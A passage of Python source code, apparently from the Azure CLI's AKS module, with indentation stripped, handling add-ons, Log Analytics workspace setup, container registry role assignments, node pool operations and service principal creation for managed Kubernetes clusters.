if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(
DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(
name, resource_group_name, update, space_name, endpoint_type, prompt)
except TypeError:
raise CLIError(
"Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(
DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(
name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
no_wait=False):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise ValidationError('The confcom addon is already enabled for this managed cluster.',
recommendation='To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None,
aci_subnet_name=None,
vnet_subnet_id=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
except Exception: # nopa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error(
"Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (
ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2",
"brazilsouth": "CQ",
"brazilsoutheast": "BRSE",
"norwayeast": "NOE",
"southafricanorth": "JNB",
"northcentralus": "NCUS",
"uaenorth": "DXB",
"germanywestcentral": "DEWC",
"ukwest": "WUK",
"switzerlandnorth": "CHN",
"switzerlandwest": "CHW",
"uaecentral": "AUH"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "brazilsouth",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "northcentralus",
"northeurope": "northeurope",
"southafricanorth": "southafricanorth",
"southafricawest": "southafricanorth",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "ukwest",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2",
"norwayeast": "norwayeast",
"norwaywest": "norwayeast",
"switzerlandnorth": "switzerlandnorth",
"switzerlandwest": "switzerlandwest",
"uaenorth": "uaenorth",
"germanywestcentral": "germanywestcentral",
"germanynorth": "germanywestcentral",
"uaecentral": "uaecentral",
"eastus2euap": "eastus2euap",
"brazilsoutheast": "brazilsoutheast"
}
# mapping for azure china cloud
# currently log analytics supported only China East 2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us governmner cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV",
"usgovarizona": "PHX"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia",
"usgovtexas": "usgovvirginia",
"usgovarizona": "usgovarizona"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
workspace_region = "eastus"
workspace_region_code = "EUS"
# sanity check that locations and clouds match.
if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(
rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(
workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(
rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(
workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(
rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(
workspace_region, "USGV")
else:
workspace_region = rg_location
workspace_region_code = rg_location.upper()
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(
subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id,
default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(
default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
# TODO: track2/replace create_or_update with begin_create_or_update, depends on 'azure.mgmt.resource.resources'
resource_groups.create_or_update(default_workspace_resource_group, {
'location': workspace_region})
GenericResource = cmd.get_models(
'GenericResource', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
generic_resource = GenericResource(location=workspace_region, properties={
'sku': {'name': 'standalone'}})
async_poller = resources.begin_create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
generic_resource)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
for key in list(addon.config):
if (key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and
key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID):
addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(
key)
workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID]
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError(
'Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(
workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(
unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id,
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
kubernetes_version=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
tags=None,
labels=None,
max_surge=None,
mode="User",
enable_encryption_at_host=False,
enable_ultra_ssd=False,
no_wait=False):
AgentPool = cmd.get_models('AgentPool',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type.lower() == "windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=zones,
scale_set_priority=priority,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
mode=mode
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
agent_pool,
)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
nodepool_name,
kubernetes_version='',
node_image_only=False,
max_surge=None,
no_wait=False):
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings', operation_group='agent_pools')
if kubernetes_version != '' and node_image_only:
raise CLIError(
'Conflicting flags. Upgrading the Kubernetes version will also '
'upgrade node image version. If you only want to upgrade the '
'node version please use the "--node-image-only" option only.'
)
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
)
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
tags=None,
max_surge=None,
mode=None,
no_wait=False):
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if update_autoscaler > 1:
raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
if (update_autoscaler == 0 and not tags and not mode and not max_surge):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
aad_session_key = None
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal, aad_session_key = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
'aad_session_key': aad_session_key,
}
def _ensure_osa_aad(cmd,
cli_ctx,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
identifier=None,
name=None, create=False,
customer_admin_group_id=None):
OpenShiftManagedClusterAADIdentityProvider = cmd.get_models('OpenShiftManagedClusterAADIdentityProvider',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
